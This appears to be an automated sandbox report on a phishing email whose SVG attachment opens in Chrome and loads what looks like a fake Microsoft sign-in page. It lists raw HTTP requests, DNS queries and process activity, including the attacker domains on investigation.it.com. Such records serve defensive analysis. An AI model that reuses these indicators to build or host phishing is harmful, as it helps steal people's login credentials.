      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6719074572-1317754460.cos.ap-tokyo.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: esqj.investigation.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: esqj.investigation.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/bannerlogo?ts=637363974368856445 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/bannerlogo?ts=637363974368856445 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: jsyk.investigation.it.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 6719074572-1317754460.cos.ap-tokyo.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: esqj.investigation.it.com
      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3699sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnwcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 14:54:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f28DQi4sSpNbUpJTcMM1kTyvh5IMLP%2Fd1R0Xtx9FAfAAMECYH%2FTsZSriddLNXk4MiS%2FZtfdLHyHbj56pzWaDMjY2IbqoNtGZXO%2FznOutpRsS6owfHl42VAW0NsDquGzpfS61686ALltAlBDL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 925700f448eb49aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=107538&min_rtt=105934&rtt_var=23998&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1265&delivery_rate=35151&cwnd=228&unsent_bytes=0&cid=f5eae0478227aca3&ts=441&x=0"
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.240.50:443 -> 192.168.2.16:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.201.1:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.222.215:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49776 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2216_707786255
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2216_707786255
      Source: classification engineClassification label: mal88.phis.winEML@26/23@42/216
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250324T1053440484-6840.etl
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Program Files (x86)\desktop.ini
      Source: b10ad005.emlVirustotal: Detection: 14%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\b10ad005.eml"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3D9F5170-6583-4C56-AE69-041DCE400F73" "5FB1A8F6-43EA-4D94-9C18-97D88016F238" "6840" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\AUF9XAMG\ATT35822.svg
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,6430514035863861534,16728946172198175755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:3
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3D9F5170-6583-4C56-AE69-041DCE400F73" "5FB1A8F6-43EA-4D94-9C18-97D88016F238" "6840" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\AUF9XAMG\ATT35822.svg
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,6430514035863861534,16728946172198175755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 0
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
